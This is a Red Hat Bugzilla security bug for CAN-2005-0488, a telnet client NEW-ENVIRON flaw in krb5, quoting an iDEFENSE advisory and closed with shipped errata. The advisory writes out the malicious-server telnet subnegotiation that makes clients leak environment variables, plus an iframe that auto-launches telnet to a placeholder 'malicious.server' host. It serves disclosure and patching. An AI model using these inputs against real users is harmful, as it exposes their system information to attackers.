Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 159304 - CAN-2005-0488 telnet Information Disclosure Vulnerability
Summary: CAN-2005-0488 telnet Information Disclosure Vulnerability
Alias: None
Product: Red Hat Enterprise Linux 4
Classification: Red Hat
Component: krb5
Version: 4.0
Hardware: All
OS: Linux
Target Milestone: ---
: ---
Assignee: Nalin Dahyabhai
QA Contact: Brian Brock
Whiteboard: impact=moderate,reported=20050218,emb...
Depends On:
TreeView+ depends on / blocked
Reported: 2005-06-01 15:45 UTC by Josh Bressers
Modified: 2007-11-30 22:07 UTC (History)
1 user (show)

Fixed In Version: RHSA-2005-567
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2005-07-12 18:16:03 UTC
Target Upstream Version:

Attachments (Terms of Use)

System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2005:562 normal SHIPPED_LIVE Critical: krb5 security update 2005-07-12 04:00:00 UTC
Red Hat Product Errata RHSA-2005:567 normal SHIPPED_LIVE Important: krb5 security update 2005-07-12 04:00:00 UTC

Description Josh Bressers 2005-06-01 15:45:28 UTC
+++ This bug was initially created as a clone of Bug #159297 +++

iDEFENSE Security Advisory XX.XX.05
MMM DD, 2005


The TELNET protocol allows virtual network terminals to be connected to
over the internet. The initial description of the telnet protocol was
given in RFC854 in May 1983. Since then there have been many extra
features added including encryption.


Remote exploitation of an input validation error in multiple telnet
clients could allow an attacker to gain sensitive information about the
victim's system.

The vulnerability specifically exists in the handling of the NEW-ENVIRON

In order to exploit this vulnerability, a malicious server can send a
connected client the following telnet command:

SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE

Vulnerable telnet clients will send the contents of the reference
environment variable, which may contain information useful to an
attacker. The expected behaviour would be only to send environment
variables related directly to the operation of the telnet client (for
example, TERM), or those specifically allowed by the user.


Successful exploitation of the vulnerability would allow an attacker to
read the values of arbitrary environment variables. By itself this
vulnerability is not a large threat, but exploiting this vulnerability
may give an attacker more information about a targetted system, which
could allow more effective attacks.

In order to exploit this vulnerability, an attacker would need to
convince the user to connect to their malicious server. It may be
possible to automatically launch the telnet command from a webpage, for

<iframe src='telnet://malicious.server/'>

On opening this page the telnet client may be launched and attempt to
connect to the host 'malicious.server'.


iDEFENSE has confirmed the existance of the vulnerability in version
5.1.2600.2180 of the Microsoft Telnet Client, the telnet client included
in the Kerberos V5 Release 1.3.6 package and the client included in the
SUNWtnetc package of Solaris 5.9. It is suspected that most BSD based
telnet clients are affected by this vulnerability. The telnet client
from the netkit-telnet package distributed with all current versions of
Redhat Linux contains a patch for this vulnerability, introduced in
early 2000. Some other distributions may also contain this patch. There
does not appear to be security advisory released at the time the patch
was added, nor does there appear to be an entry in the Bugzilla database.
This issue appears to have been mentioned in passing in
RHSA-2000-028, in relation to a vulnerability in Netscape.

For Windows based platforms, disabling the Telnet handler or specifying
a different application to handle Telnet URL's can mitigate URL based
attacks. This can be accomplished by removing or modifying the following
registry key:


This workaround should prevent automatic explotation attempts. It does
not fix the underlying issue.

iDEFENSE is currently unaware of any workarounds for this issue for other
affected platforms.

Comment 1 Josh Bressers 2005-06-01 15:46:34 UTC
This issue also affects RHEL2.1 and RHEL3

Comment 2 Josh Bressers 2005-06-01 15:47:06 UTC
The OWL patch is attachment 115035 [details]

Comment 4 Red Hat Bugzilla 2005-07-12 18:16:03 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

Note You need to log in before you can comment on or make changes to this bug.